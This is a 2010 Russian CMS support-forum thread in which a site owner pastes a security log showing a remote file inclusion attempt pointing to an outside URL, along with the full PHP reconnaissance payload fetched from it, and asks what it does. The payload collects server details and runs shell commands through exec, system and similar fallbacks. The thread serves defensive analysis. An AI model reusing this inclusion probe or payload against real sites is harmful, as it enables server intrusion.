AntiSlaed CMS
Вход
Логин: Пароль:Забыли пароль?
Запомнить вас на этом компьютере?
Войти скрытым?

Здравствуйте, Гость ( Вход | Регистрация )

> Внимание!

Адрес нашего форума изменился, теперь мы доступны по адресу antislaed.net. Обновите ссылки и закладки, он больше не изменится.


> Кто подскажет что пытались сделать с сайтом?, (+)
xpx
сообщение Feb 4 2010, 09:14
Сообщение #1


Приблуда
Иконка группы

Группа: Пользователи

Сообщений: 29
Регистрация:
25.10.2007
Пользователь №: 1,325
Спасибо сказали: 0

Вставить ник




СегоднЯ обнаружил 10 писем в почтовом Ящике с сообщением о безопасности.
ЦИТАТА
Безопасность

Запрещенное действие: URL in GET - path = http://test.bigshop.cz/uploaded/injek.txt??
IP Адрес: 209.151.70.1
Пользователь: Guest
Ссылка: //?path=http://test.bigshop.cz/uploaded/injek.txt??
Браузер: libwww-perl/5.833
Дата размещения: 03.02.2010 - 08:45:5


Просмотрев что находитьсЯ по этому адресу увидел код, кто разбираетсЯ, что с помощью этого кода хотели сделать! Кстати показал другу этот адресок, когда он его открыл, у него нод32 сработал и показал Прикрепленный файл  image001.png ( 7.67 Кб ) Кол-во загрузок: 35
, мой же NOD32 с сегодняшними обновлениЯми не реагирует.
Вот код длЯ разбора полётов. Отписываем что с помощью него можно и что хотели сделать?
КОД
<?php
//eten Response
$pwd1 =   @getcwd();
$un = @php_uname();
$os = @PHP_OS;
$id1 = ex("id");if (empty($id1)) {$id1 = @get_current_user();}
$sof1 =   @getenv("SERVER_SOFTWARE");
$php1 =   @phpversion();
$name1 = $_SERVER['SERVER_NAME'];
$ip1 = @gethostbyname($SERVER_ADDR);
$free1=   @diskfreespace($pwd1);
$all1= disk_total_space($pwd1);
$used =   ConvertBytes($all1-$free1);
$free =   ConvertBytes(@diskfreespace($pwd1));if (!$free) {$free = 0;}
$all = ConvertBytes(@disk_total_space($pwd1));if (!$all) {$all = 0;}
if (@is_writable($pwd1)) {$perm = "[W]";} else {$perm = "[R]";}
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") {$sf = "ON";} else {$sf = "OFF";}

echo "eten".$sf."<br>";
echo "uname -a:   $un<br>";
echo "os: $os<br>";
echo "id: $id1<br>";
echo "pwd: $pwd1<br>";
echo "php: $php1<br>";
echo "software:   $sof1<br>";
echo "srvip: $ip1<br>";
echo "srvname: $name1<br>";
echo "free: $free<br>";
echo "used: $used<br>";
echo "total: $all $perm<br>";

function ConvertBytes($number) {
  $len = strlen($number);
  if($len < 4) { return sprintf("%d b", $number); }
  if($len >= 4 && $len <=6) { return sprintf("%0.2f Kb", $number/1024); }
  if($len >= 7 && $len <=9) { return sprintf("%0.2f Mb", $number/1024/1024); }
  return sprintf("%0.2f Gb", $number/1024/1024/1024);
}

function ex($cfe) {
  $res = '';
  if (!empty($cfe)) {
    if(function_exists('exec')) {
      @exec($cfe,$res);
      $res = join("\n",$res);
    } elseif(function_exists('shell_exec')) {
      $res = @shell_exec($cfe);
    } elseif(function_exists('system')) {
      @ob_start();
      @system($cfe);
      $res = @ob_get_contents();
      @ob_end_clean();
    } elseif(function_exists('passthru')) {
      @ob_start();
      @passthru($cfe);
      $res = @ob_get_contents();
      @ob_end_clean();
    } elseif(@is_resource($f = @popen($cfe,"r"))) {
      $res = "";
      while(!@feof($f)) { $res .= @fread($f,1024); }
      @pclose($f);
    } else { $res = "NULL"; }
  }
  return $res;
}

exit;
?>
Перейти в начало страницы
 
     Выделите текст перед нажатием цитаты
+Цитировать сообщение

Сообщений в этой теме
xpx   Кто подскажет что пытались сделать с сайтом?   Feb 4 2010, 09:14
vitalik1972   Успокойся, ничего страшного. Просто пытались выясн...   Feb 4 2010, 11:08
xpx   Спасиб за ответ! Думаю что у хостера смышлённы...   Feb 4 2010, 11:16
rusbanka   ЦИТАТА(xpx @ Feb 4 2010, 10:14 ) СегоднЯ ...   Feb 9 2010, 06:09
xpx   Все пароли храню и так в голове, из файловых менед...   Feb 9 2010, 06:18
DjSalamander   дык привыкай не тебе одному разную хрень пытаются ...   Feb 12 2010, 23:45
xpx   и такое почти каждый день приходит. Надеюсь это не...   Feb 13 2010, 06:10
DjSalamander   ЦИТАТА(xpx @ Сегодня, 04:10 )и такое почти к...   Feb 13 2010, 13:35
xpx   Это возможно? Вообще как делают SQL инекцию? Много...   Feb 16 2010, 10:46
darkflasher   ЦИТАТА(xpx @ Feb 16 2010, 10:46 ) Это воз...   Mar 29 2010, 12:52
DjSalamander   такую дрянь в первые встечаю, в гугле толкового от...   Mar 28 2010, 07:55
vitalik1972   переполнение буфера GET пытались сделать. ас его н...   Mar 28 2010, 18:11
DjSalamander   ЦИТАТА(darkflasher @ Сегодня, 11:52 )Если пе...   Mar 29 2010, 13:07
darkflasher   ЦИТАТА(DjSalamander @ Mar 29 2010, 13:07 ...   Mar 29 2010, 13:42
DjSalamander   млин, как меня такая дрянь достала это пипец, и ет...   Jun 17 2010, 21:48
Mylenovez   ЦИТАТА(DjSalamander @ Вчера, 21:48 )Кстатье,...   Jun 18 2010, 03:12
DjSalamander   ЦИТАТА(Mylenovez @ Сегодня, 02:12 )Register ...   Jun 18 2010, 09:52
Immeasurability   DjSalamander те пытались проверить базу на доступ...   Jun 18 2010, 10:58
rocksmart   движок рулит - За все время использования ни одног...   Jun 18 2010, 12:43
DjSalamander   ЦИТАТА(Immeasurability @ Сегодня, 09:58 )те ...   Jun 18 2010, 13:22


Ответить в данную темуНачать новую тему

6 чел. читают эту тему (гостей: 6, скрытых пользователей: 0)
Пользователей: 0
 

RSS Текстовая версия Сейчас: 25 November 2024 - 13:31
Хостинг предоставлен NetLevel.Ru   Eleanor CMS